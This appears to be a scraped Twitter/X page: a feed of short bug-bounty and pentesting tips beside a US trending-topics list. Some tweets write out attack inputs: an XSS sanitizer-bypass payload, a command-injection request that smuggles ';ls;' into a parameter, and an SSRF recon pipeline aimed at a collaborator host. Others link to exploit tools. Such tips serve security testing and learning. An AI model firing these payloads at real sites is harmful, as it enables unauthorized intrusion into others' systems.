Similar User
@Ontu404
@inthomyhadi
@SaipulMhd
@Bukanranuuu
@prettyvegun
@kucingrembessss
@dedewor
@rakshitmca
@chintyareta
@amadea_12
Top SIEM Tools #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
BeeXSS is an automated tool to detect Blind XSS vulnerabilities in web applications. It injects payload, bypasses WAFs, and identifies backend execution flaws. Check it out here: github.com/AnonKryptiQuz/… #CyberSecurity #BlindXSS #Pentesting #BugBounty #hackingtools #redteam
Do wayback on root domain then get endpoints and add it to your list and fuzz on subdomains or other roots.. $ ~ waybackurls root.com |cut -d "/" -f 4-|sort -u > endpoints.txt #bugbountytips by @111xNagashy #BugBounty
JS Review and Abuse GraphQL Result 10xBAC + Admin Panel ATO medium.com/@0xbugatti/js-… #bugbounty #bugbountytips #bugbountytip
“SOQL injection in SalesForce Apex earned me $$$$$” by Rooted0x01 rooted0x01.medium.com/soql-injection…
Bypassing Multipart Parsers: File upload validation blog.sicuranext.com/breaking-down-… Credits Andrea Menin #infosec
Phishing email check
Mass Account Takeover via Reset Password Credit: SNISS medium.com/@sniss_thomas/…
Security Tweet - Day 96 Simplest recon to test for SSRF findomain -t target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace YOUR.burpcollaborator.net #cybersec #Awareness #Tweet #script #streaking
📲 jshunter By @fccdll JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for…
Search across a half million git repos in Grep website. Grep : Grep.app
~Phone number injection Check out my latest and last recon on Bumble.Where l found a bug 👀 youtu.be/274dN8GH9l8 #bugbounty #bugbountytips
"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips
0-click RCE Exploit for CVE-2024-10924 that affects 4 million WP sites 🤪 Secure your site ASAP! #WordPress #BugBounty #BugBountyTips
My Recon Engine will help you to find xss Recon Engine link github.com/freelancermija… URLFuzzer link github.com/freelancermija… Payloads link github.com/freelancermija… Youtube video link youtu.be/u6YNOindyOQ #BugBounty #hackerone #bugcrowd
Command injection : Poc payload : GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;ls;%27 HTTP/1.1 #BugBountyTips #BugBountyHunter
Find GitHub Repositories for a Specific Keyword curl -s "api.github.com/search/reposit……" | jq '.items[] | {name: .name, url: .html_url}'
🚨 𝟱𝟬 𝗥𝗘𝗣𝗢𝗦𝗧𝗦 𝗙𝗢𝗥 𝗔 𝟮𝟰-𝗛𝗢𝗨𝗥 𝗙𝗥𝗘𝗘 𝗖𝗢𝗨𝗥𝗦𝗘 𝗚𝗜𝗩𝗘𝗔𝗪𝗔𝗬! 🚨 If we hit 50 reposts on this post, I’ll make both of my courses completely FREE for 24 hours with lifetime access included: Business Logic for Bug Bounties Resource Bundle for Bug Bounties…
$500: •Use 2 accounts (same role, RBAC). Enable MFA on one. •Intercept MFA-enabled account's requests. Add cookies/Auth Bearer to Autorize. •Browse with the non-MFA account to find unprotected endpoints. effortless access control checks😌 #bugbountytip #BugBounty
United States Trends
- 1. Jameis 54,4 B posts
- 2. Broncos 69,4 B posts
- 3. Jeudy 29,5 B posts
- 4. Bo Nix 20,1 B posts
- 5. #WWERaw 135 B posts
- 6. #SkeletonCrew 10,5 B posts
- 7. Levi Wallace 5.926 posts
- 8. Elvis 14,3 B posts
- 9. Kofi 31,7 B posts
- 10. Watson 20,2 B posts
- 11. Big E 58 B posts
- 12. Delaware 62,4 B posts
- 13. #CLEvsDEN 12,7 B posts
- 14. #Dragula 1.210 posts
- 15. New Day 130 B posts
- 16. #SupermanAndLois 22,4 B posts
- 17. Chubb 7.332 posts
- 18. Sean Payton 2.719 posts
- 19. Seth 43,2 B posts
- 20. Greenland 4.164 posts
Something went wrong.
Something went wrong.